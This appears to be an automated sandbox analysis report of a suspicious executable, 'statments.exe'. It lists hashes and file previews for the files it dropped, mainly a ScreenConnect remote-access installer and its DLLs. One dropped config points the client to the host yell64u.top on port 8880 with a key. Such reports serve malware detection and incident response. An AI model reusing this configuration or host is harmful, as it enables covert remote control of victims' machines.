                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                                                  MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                                                  SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                                                  SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                                                  SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):746
                                                                                  Entropy (8bit):5.349174276064173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                  MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                  SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                  SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                  SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Users\user\Desktop\statments.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):321
                                                                                  Entropy (8bit):5.36509199858051
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                  MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                  SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                  SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                  SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):1086792
                                                                                  Entropy (8bit):7.793516535218678
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                  MD5:30CA21632F98D354A940903214AE4DE1
                                                                                  SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                  SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                  SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):234
                                                                                  Entropy (8bit):4.977464602412109
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                  MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                  SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                  SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                  SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                  Malicious:false
                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):4.62694170304723
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                  MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                  SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                  SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                  SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36864
                                                                                  Entropy (8bit):4.340550904466943
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                  MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                  SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                  SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                  SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):57344
                                                                                  Entropy (8bit):4.657268358041957
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                  MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                  SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                  SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                  SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):176128
                                                                                  Entropy (8bit):5.775360792482692
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                  MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                  SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                  SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                  SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.031251664661689
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):11776
                                                                                  Entropy (8bit):5.267782165666963
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                                                  MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                                                  SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                                                  SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                                                  SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639136400085158
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                  MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                  SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                  SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                  SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                  Process:C:\Users\user\Desktop\statments.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966820870961015
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35I53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J3:bTiuYTXTtTPTkTZT
                                                                                  MD5:E3254148A3C68C70FE5F82E74F14EA56
                                                                                  SHA1:76B93779A3DC463F21541F8E8EB5C6441F3B7456
                                                                                  SHA-256:227280270EE12AF0A171D701BA568629E1A4F34F7497E41B820CD739A811DF92
                                                                                  SHA-512:4DF1EB227E926A04AF6FFD7E14E77F0EDD7789876993D715383A0C8F5886E356DAFF93B56C43BC5E135E2F51641AF04A17F09332842C81C6B1CA357519C26131
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966820870961015
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35I53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J3:bTiuYTXTtTPTkTZT
                                                                                  MD5:E3254148A3C68C70FE5F82E74F14EA56
                                                                                  SHA1:76B93779A3DC463F21541F8E8EB5C6441F3B7456
                                                                                  SHA-256:227280270EE12AF0A171D701BA568629E1A4F34F7497E41B820CD739A811DF92
                                                                                  SHA-512:4DF1EB227E926A04AF6FFD7E14E77F0EDD7789876993D715383A0C8F5886E356DAFF93B56C43BC5E135E2F51641AF04A17F09332842C81C6B1CA357519C26131
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966820870961015
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35I53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53J3:bTiuYTXTtTPTkTZT
                                                                                  MD5:E3254148A3C68C70FE5F82E74F14EA56
                                                                                  SHA1:76B93779A3DC463F21541F8E8EB5C6441F3B7456
                                                                                  SHA-256:227280270EE12AF0A171D701BA568629E1A4F34F7497E41B820CD739A811DF92
                                                                                  SHA-512:4DF1EB227E926A04AF6FFD7E14E77F0EDD7789876993D715383A0C8F5886E356DAFF93B56C43BC5E135E2F51641AF04A17F09332842C81C6B1CA357519C26131
                                                                                  Malicious:false
                                                                                  Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):431084
                                                                                  Entropy (8bit):6.617587077964372
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:uuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvNss+:uuH2anwohwQUv5uH2anwohwQUvNss+
                                                                                  MD5:0A87745BDBD06BB3BD374CE494C7FC90
                                                                                  SHA1:2D34439C3830059E665E639F86A1A0D27B7A7205
                                                                                  SHA-256:687923C0D866D3246B26784E670282CC8E47846A0A41608E390DFBF0CCA6D4FF
                                                                                  SHA-512:22300D5078B44617E652CED1A116DBB0FC21B52BE46431AFD9B586323E9901465E844B1A1DD2B4535E06BED3C6FCEE27DA8858B142EDCDB29D9942112BDDDC0E
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI3C18.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@jpQY.@.....@.....@.....@.....@.....@......&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1623013789989871
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjZSAGiLIlHVRpMh/7777777777777777777777777vDHF8RcT/CLp3XlN:JWQI5cY6F
                                                                                  MD5:761984FEC4913E8E062AD4B7B0F8F0FF
                                                                                  SHA1:E0EACAD4D078318BB6587B43503014C6AD88F44F
                                                                                  SHA-256:9A161953AF58EAA21725D0670862CEB89EAD17219C8ADACC3D8736CF70FBBEAE
                                                                                  SHA-512:32447EABB5ED28544FD4860C06F52975C83234D79E381B38F509358C387C6F7550F89FFA1B8D4606B7FC6E71AFF82CC517F0F1C4BF0A0F455BC6EFBE4038076B
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.797639887720556
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:P8PhVuRc06WX4IFT5tp97qcq56AduNSiAUadZq+ommXrz4VWC5r2AduNSID:OhV14FTvWpYfbadwLmm34C
                                                                                  MD5:3945D7F3025C6E8C25805D401F82E6C8
                                                                                  SHA1:D5AB4D0DC97DFCE6B90E3F65E073CE746EABC516
                                                                                  SHA-256:6E69A138D6BBD179A8A45394CE5691C60C5B12D3F2044AA07233EAA6BDE9C8C3
                                                                                  SHA-512:3A7D70BC3599DF092DE9F67710A84E98C807E3F49C1A2979A62C5B99040F718A29429C48DFA011B5BE59A2402BF9577CA9495E275A1DE41DBFEB16CDE8B37746
                                                                                  Malicious:false
